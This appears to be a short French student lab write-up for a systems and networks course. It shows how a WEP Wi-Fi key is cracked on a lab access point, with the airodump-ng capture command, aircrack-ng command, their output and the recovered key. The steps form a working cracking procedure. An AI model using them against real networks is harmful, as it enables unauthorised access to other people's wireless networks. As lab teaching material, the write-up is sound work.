Atelier SysRes SE4 2025/2026 E1
Cassage de clé WIFI
WEP
Sur un 1 terminal :
sudo airodump-ng wlan1 --write crackage_pcasimir/pcasimir --bssid 04:DA:D2:9C:50:50 -c4
Il faut laisser tourner le programme pendant un moment pour capturer un maximum d'IVs (environ 50*10³)
Ce que l'on voit :
CH 4 ][ Elapsed: 40 mins ][ 2026-02-10 16:07 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:DA:D2:9C:50:50 -64 0 10771 48468 31 4 54e. WEP WEP cracotte01
BSSID STATION PWR Rate Lost Frames Notes Probes
04:DA:D2:9C:50:50 40:A5:EF:01:21:80 -73 0 -36e 621 58224
sur 2ème terminal :
Une fois qu'on a 50*10³ IV on fait :
sudo aircrack-ng -a1 -b 04:DA:D2:9C:50:50 crackage_pcasimir/pcasimir-01.cap -s
Résultat :
KB depth byte(vote)
0 1/ 2 B5(55552) 84(53504) 2B(52992) 2F(52480) A0(52480) BA(52224)
1 0/ 5 49(66304) E8(55552) 20(55296) 65(55296) 73(55296) 5F(53760)
2 41/ 2 E1(48640) 0E(48384) 3D(48384) 63(48384) 6C(48384) 9C(48384)
3 4/ 3 B3(53248) 7B(52992) 95(52992) 31(52736) 12(52224) FF(52224)
4 1/ 2 21(55552) 17(52480) 26(52224) B5(52224) 16(51968) C0(51712)
KEY FOUND! [ FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%